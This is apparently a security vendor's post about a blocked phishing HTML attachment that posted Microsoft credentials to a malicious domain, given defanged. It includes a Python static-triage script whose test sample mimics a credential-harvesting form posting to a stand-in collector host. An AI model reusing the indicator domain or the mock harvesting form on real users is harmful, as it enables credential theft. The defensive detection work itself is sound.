Recently the odix team found a new phishing scenario that poses a unique threat to end-users. "Remittance Advice/ Swift Ref: TRF675066" was a malicious HTML file sent to our CEO and scanned by FileWall.

The email contained a phishing HTML attachment, not previously identified by sandbox-based protections. Through FileWall’s Static Analysis engine, users were protected from a malicious phishing attempt hidden deep inside file attachments.

According to the FileWall admin dashboard, 6 suspicious HTML files were detected.

The FileWall dashboard reflects the file type and threat vector.

The specific malicious content is accessible in greater detail below.

The email body contained the following text, with a malicious phishing attachment.

The HTML attachment, when opened, led users to a fake Microsoft login page that posts the login credentials to a malicious domain. The HTML loaded an obfuscated fake Microsoft login page.

Once the user entered their password, the credentials were posted to a malicious domain: “https[:]//terrysmith[.]name/mine[.]php”

FileWall’s deep file inspection technology and static analysis engine blocked the file because it detected obfuscated data, data sideloading and some suspicious keywords, and flagged its content as suspect.

This phishing attack was blocked by FileWall.
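The three indicator classes named above (obfuscated data, side-loaded remote content, suspicious keywords) can be checked statically, without rendering the attachment. The following Python triage is an added example, not FileWall's algorithm or code from odix; the heuristics, keyword list, scoring threshold and the `example.invalid` sample documents are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

KEYWORDS = ("password", "sign in", "microsoft", "verify your account")  # assumed list
DECODERS = re.compile(r"\b(?:unescape|atob|decodeURIComponent|String\.fromCharCode|eval)\s*\(")
ENCODED_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){20,}|[A-Za-z0-9+/]{120,}={0,2}")
REMOTE = re.compile(r"^(?:https?:)?//", re.I)

class AttachmentScan(HTMLParser):
    """Collects remote form targets, remote resource loads and text/script bodies."""
    def __init__(self):
        super().__init__()
        self.form_targets, self.remote_loads, self.text = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and REMOTE.match(a.get("action") or ""):
            self.form_targets.append(a["action"])  # credentials would leave the file
        for attr in ("src", "href"):
            if tag in ("script", "link", "img", "iframe") and REMOTE.match(a.get(attr) or ""):
                self.remote_loads.append(a[attr])  # content pulled in at open time

    def handle_data(self, data):
        self.text.append(data)

def triage(html):
    """Return the indicators found and a verdict; two or more classes means suspect."""
    scan = AttachmentScan()
    scan.feed(html)
    scan.close()
    body = " ".join(scan.text)
    haystack = (html + unquote(html)).lower()  # keywords may sit behind %XX encoding
    findings = {
        "obfuscation": bool(DECODERS.search(body) or ENCODED_RUN.search(body)),
        "remote_loads": scan.remote_loads,
        "form_targets": scan.form_targets,
        "keywords": sorted(k for k in KEYWORDS if k in haystack),
    }
    score = sum(bool(v) for v in findings.values())
    findings["verdict"] = "suspect" if score >= 2 else "pass"
    return findings

# Constructed samples (not the attachment from this incident).
ENCODED = "".join(f"%{b:02X}" for b in b'<input type="password">')
SAMPLE_SUSPECT = f'''<html><body><h1>Sign in</h1>
<link rel="stylesheet" href="https://static.example.invalid/a.css">
<form method="post" action="https://collector.example.invalid/post.php">
<script>document.write(unescape("{ENCODED}"));</script></form></body></html>'''
SAMPLE_BENIGN = '<html><body><p>Invoice attached, total due 40 EUR.</p><img src="logo.png"></body></html>'
```

A form whose `action` is itself hidden inside the encoded string will not appear in `form_targets`, which is why the obfuscation and keyword checks are scored independently of it.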

FileWall™ by odix offers an effective plugin based on its patented algorithm for eliminating malware hidden in files. Optimized through the addition of an embedded static analysis engine, FileWall™ provides an effective malware prevention solution against both known and unknown malware attacks and handles all incoming email traffic including internal emails.

The FileWall™ advanced attachment security add-on for Microsoft 365 mail includes:

  • Seamless deployment: one-click service activation
  • Advanced email attachments handling for both internal and external senders.
  • Affordable price point
  • Deep file inspection capabilities (archive, etc).